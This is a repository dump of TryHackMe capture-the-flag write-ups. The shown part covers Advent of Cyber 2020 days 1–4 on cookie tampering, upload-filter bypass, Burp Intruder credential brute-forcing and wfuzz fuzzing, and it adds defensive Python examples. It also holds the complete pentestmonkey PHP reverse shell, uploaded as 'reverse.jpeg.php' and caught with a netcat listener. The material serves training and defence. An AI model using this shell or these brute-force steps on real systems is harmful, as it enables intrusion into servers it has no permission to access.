Repository: edoardottt/tryhackme-ctf
Branch: main
Commit: c5850cb9bf83
Files: 230
Total size: 878.7 KB
Directory structure:
gitextract_yp03w5iw/
├── .github/
│ ├── FUNDING.yml
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── auto_assign.yml
├── Active-Directory-Basics/
│ └── README.md
├── Advent-of-Cyber-2020/
│ ├── Day-01-A_Christmas_Crisis/
│ │ └── README.md
│ ├── Day-02-The_Elf_Strikes_Back!/
│ │ ├── README.md
│ │ └── reverse.jpeg.php
│ ├── Day-03-Christmas_Chaos/
│ │ └── README.md
│ ├── Day-04-Santa's_watching/
│ │ ├── README.md
│ │ └── create_list.py
│ ├── Day-05-Someone_stole_Santa's_gift_list!/
│ │ └── README.md
│ ├── Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/
│ │ └── README.md
│ ├── Day-07-The_Grinch_Really_Did_Steal_Christmas/
│ │ ├── %2f
│ │ ├── README.md
│ │ ├── elf_mcskidy_wishlist.txt
│ │ ├── pcap1.pcap
│ │ ├── pcap2.pcap
│ │ └── pcap3.pcap
│ ├── Day-08-What's_Under_the_Christmas_Tree?/
│ │ └── README.md
│ ├── Day-09-Anyone_can_be_Santa!/
│ │ ├── README.md
│ │ ├── backup.sh
│ │ ├── old_backup.sh
│ │ └── shoppinglist.txt
│ ├── Day-10-Dont-be-sElfish/
│ │ ├── README.md
│ │ └── note_from_mcskidy.txt
│ ├── Day-11-The_Rogue_Gnome/
│ │ ├── LinEnum.sh
│ │ └── README.md
│ ├── Day-12-Ready,_set,_elf./
│ │ └── README.md
│ ├── Day-13-Coal_for_Christmas/
│ │ ├── README.md
│ │ └── dirty.c
│ ├── Day-14-Where's Rudolph?/
│ │ └── README.md
│ ├── Day-15-There's a Python in my stocking!/
│ │ └── README.md
│ ├── Day-16-Help! Where is Santa?/
│ │ ├── README.md
│ │ └── api_fuzzer.py
│ ├── Day-17-ReverseELFneering/
│ │ └── README.md
│ ├── Day-18-The_Bits_of_Christmas/
│ │ └── README.md
│ ├── Day-19-The_Naughty_or_Nice_List/
│ │ └── README.md
│ ├── Day-20-PowershELlF_to_the_rescue/
│ │ └── README.md
│ ├── Day-21-Time_for_some_ELForensics/
│ │ └── README.md
│ ├── Day-22-Elf_McEager_becomes_CyberElf/
│ │ └── README.md
│ ├── Day-23-The_Grinch_strikes_again!/
│ │ └── README.md
│ ├── Day-24-The_Trial_Before_Christmas/
│ │ └── README.md
│ └── README.md
├── Advent-of-Cyber-2021/
│ ├── Day-01-Save_The_Gifts/
│ │ └── README.md
│ ├── Day-02-Elf_HR_Problems/
│ │ └── README.md
│ ├── Day-03-Christmas_Blackout/
│ │ └── README.md
│ ├── Day-04-Santas_Running_Behind/
│ │ └── README.md
│ ├── Day-05-Pesky_Elf_Forum/
│ │ └── README.md
│ ├── Day-06-Patch_Management_Is_Hard/
│ │ └── README.md
│ ├── Day-07-Migration_Without_Security/
│ │ └── README.md
│ ├── Day-08-Santas_Bag_of_Toys/
│ │ └── README.md
│ ├── Day-09-Where_Is_All_This_Data_Going/
│ │ ├── AoC3.pcap
│ │ └── README.md
│ ├── Day-10-Offensive_Is_The_Best_Defence/
│ │ └── README.md
│ ├── Day-11-Where_Are_The_Reindeers/
│ │ └── README.md
│ ├── Day-12-Sharing_Without_Caring/
│ │ └── README.md
│ ├── Day-13-They_Lost_The_Plan/
│ │ └── README.md
│ ├── Day-14-Dev(Insecure)Ops/
│ │ └── README.md
│ ├── Day-15-The_Grinchs_day_off/
│ │ └── README.md
│ ├── Day-16-Ransomware_Madness/
│ │ └── README.md
│ ├── Day-17-Elf_Leaks/
│ │ └── README.md
│ ├── Day-18-Playing_With_Containers/
│ │ └── README.md
│ ├── Day-19-Something_Phishy_Is_Going_On/
│ │ └── README.md
│ ├── Day-20-What_s_the_Worst_That_Could_Happen/
│ │ └── README.md
│ ├── Day-21-Needles_In_Computer_Stacks/
│ │ └── README.md
│ ├── Day-22-How_It_Happened/
│ │ └── README.md
│ ├── Day-23-PowershELlF_Magic/
│ │ └── README.md
│ ├── Day-24-Learning_From_The_Grinch/
│ │ └── README.md
│ └── README.md
├── Agent-Sudo/
│ ├── README.md
│ ├── To_agentJ.txt
│ ├── _cutie.png.extracted/
│ │ ├── 365
│ │ ├── 365.zlib
│ │ ├── To_agentR.txt
│ │ └── zip.hash
│ └── message.txt
├── Anonymous/
│ └── README.md
├── Attacking-Kerberos/
│ └── README.md
├── Attacktive-Directory/
│ └── README.md
├── Authenticate/
│ └── README.md
├── Avengers-Blog/
│ └── README.md
├── Baron-Samedit/
│ └── README.md
├── Bash-Scripting/
│ └── README.md
├── Bebop/
│ └── README.md
├── Bolt/
│ └── README.md
├── Bounty-Hacker/
│ ├── README.md
│ ├── locks.txt
│ └── task.txt
├── Brooklyn-Nine-Nine/
│ └── README.md
├── Brute-It/
│ └── README.md
├── Burp-Suite/
│ └── README.md
├── CC:-Radare2/
│ └── README.md
├── CTF-collection-Vol.1/
│ └── README.md
├── Chill-Hack/
│ └── README.md
├── Common-Linux-Privesc/
│ └── README.md
├── Cross-site-Scripting/
│ └── README.md
├── Cyborg/
│ └── README.md
├── Easy-Peasy/
│ ├── README.md
│ ├── easypeasy.txt
│ ├── hash.txt
│ └── secrettext.txt
├── Encryption-Crypto-101/
│ └── README.md
├── Erit-Securus-I/
│ └── README.md
├── Game-Zone/
│ └── README.md
├── GamingServer/
│ └── README.md
├── Geolocating-Images/
│ └── README.md
├── Getting-Started/
│ └── README.md
├── GoldenEye/
│ └── README.md
├── Gotta-Catch'em-All/
│ └── README.md
├── Hacking-with-Powershell/
│ └── README.md
├── Hardening-Basics-Part-1/
│ └── README.md
├── Hardening-Basics-Part-2/
│ └── README.md
├── Hashing-Crypto_101/
│ └── README.md
├── HeartBleed/
│ └── README.md
├── Intro-PoC-Scripting/
│ └── README.md
├── Intro-to-Python/
│ ├── README.md
│ └── decode.py
├── Intro-to-Windows/
│ └── README.md
├── Introduction-to-Django/
│ └── README.md
├── Introduction-to-Flask/
│ └── README.md
├── Introduction-to-OWASP-ZAP/
│ └── README.md
├── Introductory-Networking/
│ └── README.md
├── JavaScript-Basics/
│ ├── README.md
│ └── sort.js
├── John-The-Ripper/
│ └── README.md
├── Jurassic-Park/
│ └── README.md
├── LFI/
│ └── README.md
├── LFI-Basics/
│ └── README.md
├── LICENSE
├── LazyAdmin/
│ ├── README.md
│ ├── hash.txt
│ ├── mysql_bakup_20191129023059-1.5.1.sql
│ └── rshell.php
├── Linux-Challenges/
│ └── README.md
├── Linux-Fundamentals/
│ ├── Linux-Fundamentals-Part-1/
│ │ └── README.md
│ ├── Linux-Fundamentals-Part-2/
│ │ └── README.md
│ └── Linux-Fundamentals-Part-3/
│ └── README.md
├── Linux-Strength-Training/
│ └── README.md
├── Linux:-Local-Enumeration/
│ └── README.md
├── MAL:-REMnux-The_Redux/
│ └── README.md
├── NIS-Linux_Part_I/
│ └── README.md
├── Nessus/
│ └── README.md
├── Network-Services/
│ └── README.md
├── Network-Services-2/
│ └── README.md
├── Networking/
│ └── README.md
├── Ninja-Skills/
│ └── README.md
├── Nmap/
│ └── README.md
├── OWASP-Juice-Shop/
│ ├── README.md
│ └── ftp/
│ ├── acquisitions.md
│ ├── announcement_encrypted.md
│ ├── coupons_2013.md.bak%00..md
│ ├── eastere.gg%00.md
│ ├── encrypt.pyc%00.md
│ ├── incident-support.kdbx
│ ├── legal.md
│ ├── package.json.bak%00.md
│ ├── quarantine/
│ │ ├── juicy_malware_linux_amd_64.url
│ │ ├── juicy_malware_linux_arm_64.url
│ │ ├── juicy_malware_macos_64.url
│ │ └── juicy_malware_windows_64.exe.url
│ └── suspicious_errors.yml%00.md
├── OWASP-Top-10/
│ ├── 47887.py
│ ├── 48973.txt
│ ├── README.md
│ ├── login-logs.txt
│ └── rce.py
├── Overpass/
│ ├── README.md
│ └── downloads/
│ └── src/
│ └── buildscript.sh
├── Overpass2-Hacked/
│ ├── README.md
│ ├── fasttrack.txt
│ └── overpass2.pcapng
├── Persistence/
│ └── README.md
├── Pickle-Rick/
│ ├── README.md
│ └── reverse-shell.sh
├── Post-Exploitation-Basics/
│ └── README.md
├── README.md
├── Regular-expressions/
│ └── README.md
├── Res/
│ └── README.md
├── RootMe/
│ ├── README.md
│ └── reverse-shell.php5
├── SSRF/
│ └── README.md
├── Searchlight-IMINT/
│ └── README.md
├── Skynet/
│ └── README.md
├── Starting-Out-In-Cyber-Sec/
│ └── README.md
├── Startup/
│ ├── README.md
│ ├── notice.txt
│ └── suspicious.pcapng
├── Steel-Mountain/
│ └── README.md
├── Sublist3r/
│ ├── README.md
│ └── sub-output-nbc.txt
├── The-Cod-Caper/
│ └── README.md
├── The-find-command/
│ └── README.md
├── Toolbox-Vim/
│ └── README.md
├── ToolsRus/
│ └── README.md
├── Tor/
│ └── README.md
├── Upload-Vulnerabilities/
│ └── README.md
├── Web-Scanning/
│ └── README.md
├── Wgel-CTF/
│ └── README.md
├── What-the-Shell?/
│ └── README.md
├── Windows-PrivEsc/
│ └── README.md
├── Wireshark-101/
│ └── README.md
├── XXE/
│ └── README.md
├── Year-of-the-Rabbit/
│ └── README.md
├── ZTH:-Obscure-Web-Vulns/
│ └── README.md
├── ZTH:-Web_2/
│ └── README.md
├── Zero-Logon/
│ └── README.md
├── cc-pentesting/
│ └── README.md
├── crack-the-hash/
│ ├── hash1_4.txt
│ ├── hash2_1.txt
│ ├── hash2_2.txt
│ └── hash2_3.txt
├── iOS-Forensics/
│ └── README.md
├── ignite/
│ ├── 47138.py
│ ├── fuel-cms-exploit.py
│ └── revshell.php
├── kenobi/
│ ├── id_rsa
│ └── log.txt
├── lianyu/
│ ├── exiftool_Queens_Gambit-output.txt
│ ├── exiftool_aa-output.txt
│ ├── exiftool_leave-me-alone-output.txt
│ ├── exploit
│ ├── exploit.c
│ ├── exploit.c.save
│ ├── gobuster-output.txt
│ ├── gobuster-output2.txt
│ ├── gobuster-output3.txt
│ ├── nmap-output.txt
│ └── ss/
│ ├── passwd.txt
│ └── shado
└── tomghost/
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/FUNDING.yml
================================================
github: edoardottt
liberapay: edoardottt
patreon: edoardottt
ko_fi: edoardottt
open_collective: edoardottt
custom: "https://www.paypal.me/edoardottt"
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
================================================
FILE: .github/auto_assign.yml
================================================
# Set to true to add reviewers to pull requests
addReviewers: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- edoardottt
# A list of keywords to be skipped the process that add reviewers if pull requests include it
skipKeywords:
- wip
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 0
================================================
FILE: Active-Directory-Basics/README.md
================================================
# Active Directory Basics
- I understand what Active Directory is and why it is used.
no answer needed
- What database does the AD DS contain?
- `NTDS.dit`
- Where is the NTDS.dit stored?
- `%SystemRoot%\NTDS`
- What type of machine can be a domain controller?
- `Windows server`
- What is the term for a hierarchy of domains in a network?
- `tree`
- What is the term for the rules for object creation?
- `Domain schema`
- What is the term for containers for groups, computers, users, printers, and other OUs?
- `Organization units`
- Which type of groups specify user permissions?
- `Security groups`
- Which group contains all workstations and servers joined to the domain?
- `Domain computers`
- Which group can publish certificates to the directory?
- `Cert publisher`
- Which user can make changes to a local machine but not to a domain controller?
- `Local administrators`
- Which group has their passwords replicated to read-only domain controllers?
- `Allowed RODC Password Replication Group`
- What type of trust flows from a trusting domain to a trusted domain?
- `Directional`
- What type of trusts expands to include other trusted domains?
- `Transitive`
- What type of authentication uses tickets?
- `Kerberos`
- What domain service can create, validate, and revoke public key certificates?
- `Certificate Services`
- What is the Azure AD equivalent of LDAP?
- `Rest apis`
- What is the Azure AD equivalent of Domains and Forests?
- `Tenants`
- What is the Windows Server AD equivalent of Guests?
- `Trusts`
- Deploy the machine
no answer needed
- What is the name of the Windows 10 operating system?
- `Get-NetComputer -fulldata | select operatingsystem`
- `*********** ** ********* **********`
- What is the second "Admin" name?
- `Get-NetUser | select cn`
- `******`
- Which group has a capital “V” in the group name?
- `net localgroup`
- `Hyper-V Administrators`
- When was the password last set for the SQLService user?
- `Get-ADUser -identity SQLService -properties *`
- `5/**/2020 *:**:** PM`
- I understand the basics of Active Directory
no answer needed
================================================
FILE: Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md
================================================
# Day 1 - A Christmas Crisis
- **Deploy your AttackBox (the blue "Start AttackBox" button)** and the task's machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machine's IP into the browser address bar.
no answer needed
- Register for an account, and then login.
What is the name of the cookie used for authentication?
- Open the page in a browser (I suggest Chrome or Firefox) and fire up the browser developer tools (F12). Go to the Storage tab and select Cookies on the left. `auth`.
- In what format is the value of this cookie encoded?
- `hexadecimal`
- Having decoded the cookie, what format is the data stored in?
- `json`
- Figure out how to bypass the authentication.
What is the value of Santa's cookie?
- Decode your cookie value from hexadecimal to text. I used [this](https://cryptii.com/pipes/hex-decoder). Then change your username to `santa` and encode the result back to hexadecimal. You should have something like: `************************************************************************************************d65223a2253616e7461227d`
- Now, if you replace the previous cookie with this new one and refresh the page, you will see some changes...
- Now that you are the santa user, you can re-activate the assembly line!
What is the flag you're given when the line is fully active?
- `THM{********************************}`
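Added example, not part of the write-up or the room: a Python model of the Day 1 cookie (hex-encoded JSON) with the tampering the task describes reproduced, so that an HMAC-signed variant of the same cookie can be shown rejecting it. The cookie contents and `SERVER_SECRET` are constructed values.

```python
import binascii
import hashlib
import hmac
import json

# Constructed cookie in the shape the task describes: hex text that decodes to
# a JSON document carrying the session identity. Not the room's real cookie.
SAMPLE_AUTH_COOKIE = binascii.hexlify(
    json.dumps({"company": "The Best Festival Company", "username": "elf"}).encode()
).decode()

# Hypothetical server-side key; a real application loads it from configuration.
SERVER_SECRET = b"constructed-demo-secret-change-me"


def decode_auth_cookie(hex_value: str) -> dict:
    """Hex -> bytes -> JSON: the two decoding steps the task walks through."""
    return json.loads(binascii.unhexlify(hex_value))


def encode_auth_cookie(payload: dict) -> str:
    """Inverse of decode_auth_cookie; the value is reversible, not secret."""
    return binascii.hexlify(json.dumps(payload).encode()).decode()


def forge_username(hex_value: str, new_username: str) -> str:
    """The tampering the write-up performs: decode, swap the username field,
    re-encode. It works because nothing binds the blob to the server."""
    payload = decode_auth_cookie(hex_value)
    payload["username"] = new_username
    return encode_auth_cookie(payload)


def sign_cookie(hex_value: str, secret: bytes = SERVER_SECRET) -> str:
    """Mitigation: append an HMAC-SHA256 tag over the encoded payload, so any
    edit to the payload invalidates the tag unless the secret is known."""
    tag = hmac.new(secret, hex_value.encode(), hashlib.sha256).hexdigest()
    return f"{hex_value}.{tag}"


def verify_cookie(signed: str, secret: bytes = SERVER_SECRET):
    """Return the payload if the tag matches it, otherwise None.
    compare_digest keeps the comparison constant-time."""
    hex_value, _, tag = signed.rpartition(".")
    if not hex_value or not tag:
        return None
    expected = hmac.new(secret, hex_value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        return decode_auth_cookie(hex_value)
    except ValueError:  # bad hex or bad JSON (binascii.Error is a ValueError)
        return None
```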
## see you...
================================================
FILE: Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md
================================================
# Day 2 - The Elf Strikes Back!
- What string of text needs to be added to the URL to get access to the upload page?
- `?id=YOUR-ID-HERE`
- What type of file is accepted by the site?
- Open the browser and check the page source code. You will find this string: `<input type=file id="chooseFile" accept=".jpeg,.jpg,.png">`
- `image`
- Bypass the filter and upload a reverse shell.
In which directory are the uploaded files stored?
- Change the IP in the file reverse.jpeg.php to your VPN IP (the address of the tun0 interface) and upload that file.
- `/uploads/`
- Activate your reverse shell and catch it in a netcat listener!
- `nc -lvnp 1234`
- Go to `http://<TARGET_IP>/uploads/` and click on reverse.jpeg.php
- You should see a shell.
- What is the flag in /var/www/flag.txt?
- `cat /var/www/flag.txt`
- `THM{**********************************}`
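Added example, not code from the room: the server-side check the upload page lacks, in Python. It validates the last extension (so `reverse.jpeg.php` is treated as a `.php` file), checks the file signature, and derives the stored name from the content instead of the client. The sample uploads are constructed.

```python
import hashlib
import os

# The form's <input accept=".jpeg,.jpg,.png"> is only a browser-side hint; the
# same set must be enforced on the server, against the *last* extension.
ALLOWED_EXTENSIONS = {".jpeg", ".jpg", ".png"}

# Leading bytes (file signatures) of the image types the site claims to accept.
MAGIC_BYTES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
}


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason). 'reverse.jpeg.php' fails on the extension;
    a PHP file renamed to 'shell.jpg' fails on the signature check."""
    _, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} is not an allowed image extension"
    if not any(data.startswith(magic) for magic in MAGIC_BYTES):
        return False, "content does not start with a JPEG or PNG signature"
    return True, "ok"


def storage_name(data: bytes) -> str:
    """Name the stored file from its content hash and the extension implied by
    its signature, so the client-chosen name never reaches the filesystem."""
    for magic, ext in MAGIC_BYTES.items():
        if data.startswith(magic):
            return hashlib.sha256(data).hexdigest()[:16] + ext
    raise ValueError("content is not a supported image")


# Constructed sample uploads (not files from the room).
GENUINE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16
GENUINE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_TEXT = b"<?php echo 'not an image'; ?>"
```

The `/uploads/` directory should additionally be served with script execution disabled, since the shell in the write-up only runs because the web server interprets `.php` files there.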
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/reverse.jpeg.php
================================================
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
================================================
FILE: Advent-of-Cyber-2020/Day-03-Christmas_Chaos/README.md
================================================
# Day 3 - Christmas Chaos
- Deploy your AttackBox (the blue "Start AttackBox" button) and the task's machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machine's IP (<TARGET_IP>) into the browser address bar.
no answer needed
You should see a login page like this:

- Use BurpSuite to bruteforce the login form. Use the following lists for the default credentials:
| Username | Password |
|---|---|
| root | root |
| admin | password |
| user | 12345 |
Use the correct credentials to log in to the Santa Sleigh Tracker app. Don't forget to turn off FoxyProxy once BurpSuite has finished the attack.
- First of all, make sure your browser traffic goes through the proxy. If you're using the AttackBox, follow the instructions on the room page to enable it. Otherwise, add the FoxyProxy extension and create a record with these options: name: `Burp` (or whatever you like); Proxy type: `HTTP`; Proxy IP: `127.0.0.1`; Port: `8080`. Then save and enable it.
- Open BurpSuite and submit a login request (with a random username and password) from the browser.
- On the proxy tab of BurpSuite you should see a new request captured. Something like this:
```http
POST /login HTTP/1.1
Host: <TARGET_IP>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://<TARGET_IP>
Connection: close
Referer: http://<TARGET_IP>/
Upgrade-Insecure-Requests: 1

username=<USERNAME>&password=<PASSWORD>
```
- Right click on it and click `send to Intruder`.
- Go to the Intruder tab and then to the Positions sub-tab.
- Change the attack type from `Sniper` to `Cluster Bomb`.
- Make sure <USERNAME> and <PASSWORD> are marked as payload positions, i.e. `username=§<USERNAME>§&password=§<PASSWORD>§`. If not, highlight them with the cursor and click `Add §`.
- Then switch to the Payloads sub-tab and set all the payloads. We have two payload positions, username and password, numbered 1 and 2. So, for instance, to set the list of candidate usernames, set the `Payload set` option to `1` and then add our three items to the payload list (just an example; in a real engagement the lists could drive thousands of requests). Do the same for the password.
- Start the attack.
- You can see that one of the result rows has a different response length from the others... Let's try those login credentials!
- Turn off the proxy in FoxyProxy.
- It works!
- `THM{********************************}`
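Added example, not part of the write-up: the server-side view of a Cluster Bomb run. It parses constructed Combined Log Format lines (not logs from the room) and flags clients that hit `/login` in bursts, reporting the responses whose size differs from the usual failure page, which is the same length difference the Intruder results table reveals to the attacker.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed access-log lines: one client fires a 3x3 Cluster Bomb run at
# /login (nine POSTs in a few seconds, one of them answered differently),
# another client logs in normally a few minutes later.
SAMPLE_LOG = """\
10.10.1.5 - - [03/Dec/2020:10:00:01 +0000] "GET /login HTTP/1.1" 200 1102 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:02 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:02 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:03 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:03 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:04 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:04 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:05 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:05 +0000] "POST /login HTTP/1.1" 302 2041 "-" "Mozilla/5.0"
10.10.1.5 - - [03/Dec/2020:10:00:06 +0000] "POST /login HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
10.10.2.9 - - [03/Dec/2020:10:03:10 +0000] "POST /login HTTP/1.1" 302 2041 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_log(text):
    """Yield (ip, timestamp, method, path, status, size) per well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # lines that do not fit the format are skipped, not guessed
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        size = int(m["size"]) if m["size"] != "-" else 0
        yield m["ip"], ts, m["method"], m["path"], int(m["status"]), size


def find_login_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: report} for clients that POST /login at least `threshold`
    times inside any `window`. The report lists the responses whose size differs
    from the burst's most common size: with a fixed failure page, the odd one
    out is the attempt that got a different (probably successful) answer."""
    per_ip = {}
    for ip, ts, method, path, status, size in parse_log(text):
        if method == "POST" and path == "/login":
            per_ip.setdefault(ip, []).append((ts, status, size))
    reports = {}
    for ip, attempts in per_ip.items():
        attempts.sort(key=lambda a: a[0])
        times = [a[0] for a in attempts]
        burst = any(times[i + threshold - 1] - times[i] <= window
                    for i in range(len(times) - threshold + 1))
        if not burst:
            continue
        usual_size, _ = Counter(a[2] for a in attempts).most_common(1)[0]
        odd = [(ts.isoformat(), status, size)
               for ts, status, size in attempts if size != usual_size]
        reports[ip] = {"attempts": len(attempts), "usual_size": usual_size,
                       "odd_responses": odd}
    return reports
```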
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md
================================================
# Day 4 - Santa's watching
Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of **YYYYMMDD**.
Recommended list: [big.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt)
- Deploy your AttackBox (the blue "Start AttackBox" button) and the task's machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machine's IP (10.10.135.56) into the browser address bar.
no answer needed
If you navigate to <TARGET_IP> in your browser you should see this page:

- Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)
**Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!**
- `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`
- Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?
- `gobuster dir -u <TARGET_IP> -w big.txt`
- You will find the API directory and a PHP file inside it.
- Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
- Execute the python file with `python3 create_list.py`. It will create a list for you with format `YYYYMMDD`.
- `wfuzz -c -z file,YYYYMMDD-list.txt -d "date=FUZZ" --hw 0 http://<TARGET_IP>/api/site-log.php`
- This command fuzzes the date parameter; I've added the --hw parameter set to 0 because I tried a few times and saw that the incorrect answers contain no words.
- The only response with words you get is for a single date. Take that date, let's say it is YYYYMMDD, and open `http://<TARGET_IP>/api/site-log.php?date=YYYYMMDD` in the browser.
- `THM{********}`
# see you ...
================================================
